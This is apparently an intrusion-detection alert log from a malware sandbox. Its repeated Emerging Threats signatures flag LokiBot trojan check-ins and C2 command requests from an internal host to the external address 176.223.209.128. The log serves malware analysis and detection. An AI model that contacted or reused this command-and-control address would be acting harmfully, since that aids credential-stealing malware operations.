                                              11/25/21-10:50:49.981482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015480192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.981482TCP2025381ET TROJAN LokiBot Checkin5015480192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.981482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015480192.168.11.20176.223.209.128
                                              11/25/21-10:50:50.494751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015580192.168.11.20176.223.209.128
                                              11/25/21-10:50:50.494751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015580192.168.11.20176.223.209.128
                                              11/25/21-10:50:50.494751TCP2025381ET TROJAN LokiBot Checkin5015580192.168.11.20176.223.209.128
                                              11/25/21-10:50:50.494751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015580192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.037018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015680192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.037018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015680192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.037018TCP2025381ET TROJAN LokiBot Checkin5015680192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.037018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015680192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.551709TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015780192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.551709TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015780192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.551709TCP2025381ET TROJAN LokiBot Checkin5015780192.168.11.20176.223.209.128
                                              11/25/21-10:50:51.551709TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015780192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.056652TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015880192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.056652TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015880192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.056652TCP2025381ET TROJAN LokiBot Checkin5015880192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.056652TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015880192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.572450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015980192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.572450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015980192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.572450TCP2025381ET TROJAN LokiBot Checkin5015980192.168.11.20176.223.209.128
                                              11/25/21-10:50:52.572450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015980192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.087854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016080192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.087854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016080192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.087854TCP2025381ET TROJAN LokiBot Checkin5016080192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.087854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016080192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.604490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016180192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.604490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016180192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.604490TCP2025381ET TROJAN LokiBot Checkin5016180192.168.11.20176.223.209.128
                                              11/25/21-10:50:53.604490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016180192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.126117TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016280192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.126117TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016280192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.126117TCP2025381ET TROJAN LokiBot Checkin5016280192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.126117TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016280192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.652803TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016380192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.652803TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016380192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.652803TCP2025381ET TROJAN LokiBot Checkin5016380192.168.11.20176.223.209.128
                                              11/25/21-10:50:54.652803TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016380192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.150613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016480192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.150613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016480192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.150613TCP2025381ET TROJAN LokiBot Checkin5016480192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.150613TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016480192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.643187TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016680192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.643187TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016680192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.643187TCP2025381ET TROJAN LokiBot Checkin5016680192.168.11.20176.223.209.128
                                              11/25/21-10:50:55.643187TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016680192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.163152TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016780192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.163152TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016780192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.163152TCP2025381ET TROJAN LokiBot Checkin5016780192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.163152TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016780192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.612755TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016880192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.612755TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016880192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.612755TCP2025381ET TROJAN LokiBot Checkin5016880192.168.11.20176.223.209.128
                                              11/25/21-10:50:56.612755TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016880192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.123615TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15016980192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.123615TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5016980192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.123615TCP2025381ET TROJAN LokiBot Checkin5016980192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.123615TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25016980192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.646528TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017080192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.646528TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017080192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.646528TCP2025381ET TROJAN LokiBot Checkin5017080192.168.11.20176.223.209.128
                                              11/25/21-10:50:57.646528TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017080192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.136639TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017180192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.136639TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017180192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.136639TCP2025381ET TROJAN LokiBot Checkin5017180192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.136639TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017180192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.574452TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017280192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.574452TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017280192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.574452TCP2025381ET TROJAN LokiBot Checkin5017280192.168.11.20176.223.209.128
                                              11/25/21-10:50:58.574452TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017280192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.081034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017380192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.081034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017380192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.081034TCP2025381ET TROJAN LokiBot Checkin5017380192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.081034TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017380192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.594204TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017480192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.594204TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017480192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.594204TCP2025381ET TROJAN LokiBot Checkin5017480192.168.11.20176.223.209.128
                                              11/25/21-10:50:59.594204TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017480192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.115568TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017580192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.115568TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017580192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.115568TCP2025381ET TROJAN LokiBot Checkin5017580192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.115568TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017580192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.621599TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017680192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.621599TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017680192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.621599TCP2025381ET TROJAN LokiBot Checkin5017680192.168.11.20176.223.209.128
                                              11/25/21-10:51:00.621599TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017680192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.133542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017780192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.133542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017780192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.133542TCP2025381ET TROJAN LokiBot Checkin5017780192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.133542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017780192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.656411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017880192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.656411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017880192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.656411TCP2025381ET TROJAN LokiBot Checkin5017880192.168.11.20176.223.209.128
                                              11/25/21-10:51:01.656411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017880192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.166862TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017980192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.166862TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017980192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.166862TCP2025381ET TROJAN LokiBot Checkin5017980192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.166862TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017980192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.675779TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018080192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.675779TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018080192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.675779TCP2025381ET TROJAN LokiBot Checkin5018080192.168.11.20176.223.209.128
                                              11/25/21-10:51:02.675779TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018080192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.197639TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018180192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.197639TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018180192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.197639TCP2025381ET TROJAN LokiBot Checkin5018180192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.197639TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018180192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.728227TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018280192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.728227TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018280192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.728227TCP2025381ET TROJAN LokiBot Checkin5018280192.168.11.20176.223.209.128
                                              11/25/21-10:51:03.728227TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018280192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.168732TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018380192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.168732TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018380192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.168732TCP2025381ET TROJAN LokiBot Checkin5018380192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.168732TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018380192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.679603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018480192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.679603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018480192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.679603TCP2025381ET TROJAN LokiBot Checkin5018480192.168.11.20176.223.209.128
                                              11/25/21-10:51:04.679603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018480192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.197175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018580192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.197175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018580192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.197175TCP2025381ET TROJAN LokiBot Checkin5018580192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.197175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018580192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.722649TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018680192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.722649TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018680192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.722649TCP2025381ET TROJAN LokiBot Checkin5018680192.168.11.20176.223.209.128
                                              11/25/21-10:51:05.722649TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018680192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.242183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018780192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.242183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018780192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.242183TCP2025381ET TROJAN LokiBot Checkin5018780192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.242183TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018780192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.737953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018880192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.737953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018880192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.737953TCP2025381ET TROJAN LokiBot Checkin5018880192.168.11.20176.223.209.128
                                              11/25/21-10:51:06.737953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018880192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.173148TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018980192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.173148TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018980192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.173148TCP2025381ET TROJAN LokiBot Checkin5018980192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.173148TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018980192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.681215TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019080192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.681215TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019080192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.681215TCP2025381ET TROJAN LokiBot Checkin5019080192.168.11.20176.223.209.128
                                              11/25/21-10:51:07.681215TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019080192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.197546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019180192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.197546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019180192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.197546TCP2025381ET TROJAN LokiBot Checkin5019180192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.197546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019180192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.699100TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019280192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.699100TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019280192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.699100TCP2025381ET TROJAN LokiBot Checkin5019280192.168.11.20176.223.209.128
                                              11/25/21-10:51:08.699100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019280192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.171002TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019380192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.171002TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019380192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.171002TCP2025381ET TROJAN LokiBot Checkin5019380192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.171002TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019380192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.689189TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019480192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.689189TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019480192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.689189TCP2025381ET TROJAN LokiBot Checkin5019480192.168.11.20176.223.209.128
                                              11/25/21-10:51:09.689189TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019480192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.157749TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019580192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.157749TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019580192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.157749TCP2025381ET TROJAN LokiBot Checkin5019580192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.157749TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019580192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.674042TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019680192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.674042TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019680192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.674042TCP2025381ET TROJAN LokiBot Checkin5019680192.168.11.20176.223.209.128
                                              11/25/21-10:51:10.674042TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019680192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.173859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019780192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.173859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019780192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.173859TCP2025381ET TROJAN LokiBot Checkin5019780192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.173859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019780192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.656343TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019880192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.656343TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019880192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.656343TCP2025381ET TROJAN LokiBot Checkin5019880192.168.11.20176.223.209.128
                                              11/25/21-10:51:11.656343TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019880192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.172382TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019980192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.172382TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019980192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.172382TCP2025381ET TROJAN LokiBot Checkin5019980192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.172382TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019980192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.686144TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020080192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.686144TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020080192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.686144TCP2025381ET TROJAN LokiBot Checkin5020080192.168.11.20176.223.209.128
                                              11/25/21-10:51:12.686144TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020080192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.206222TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020180192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.206222TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020180192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.206222TCP2025381ET TROJAN LokiBot Checkin5020180192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.206222TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020180192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.758899TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020280192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.758899TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020280192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.758899TCP2025381ET TROJAN LokiBot Checkin5020280192.168.11.20176.223.209.128
                                              11/25/21-10:51:13.758899TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020280192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.276834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020380192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.276834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020380192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.276834TCP2025381ET TROJAN LokiBot Checkin5020380192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.276834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020380192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.793079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020480192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.793079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020480192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.793079TCP2025381ET TROJAN LokiBot Checkin5020480192.168.11.20176.223.209.128
                                              11/25/21-10:51:14.793079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020480192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.296671TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020580192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.296671TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020580192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.296671TCP2025381ET TROJAN LokiBot Checkin5020580192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.296671TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020580192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.731165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020680192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.731165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020680192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.731165TCP2025381ET TROJAN LokiBot Checkin5020680192.168.11.20176.223.209.128
                                              11/25/21-10:51:15.731165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020680192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.250456TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020780192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.250456TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020780192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.250456TCP2025381ET TROJAN LokiBot Checkin5020780192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.250456TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020780192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.767595TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020880192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.767595TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020880192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.767595TCP2025381ET TROJAN LokiBot Checkin5020880192.168.11.20176.223.209.128
                                              11/25/21-10:51:16.767595TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020880192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.275025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020980192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.275025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020980192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.275025TCP2025381ET TROJAN LokiBot Checkin5020980192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.275025TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020980192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.712223TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021180192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.712223TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021180192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.712223TCP2025381ET TROJAN LokiBot Checkin5021180192.168.11.20176.223.209.128
                                              11/25/21-10:51:17.712223TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021180192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.178122TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021280192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.178122TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021280192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.178122TCP2025381ET TROJAN LokiBot Checkin5021280192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.178122TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021280192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.705661TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021380192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.705661TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021380192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.705661TCP2025381ET TROJAN LokiBot Checkin5021380192.168.11.20176.223.209.128
                                              11/25/21-10:51:18.705661TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021380192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.166859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021480192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.166859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021480192.168.11.20176.223.209.128
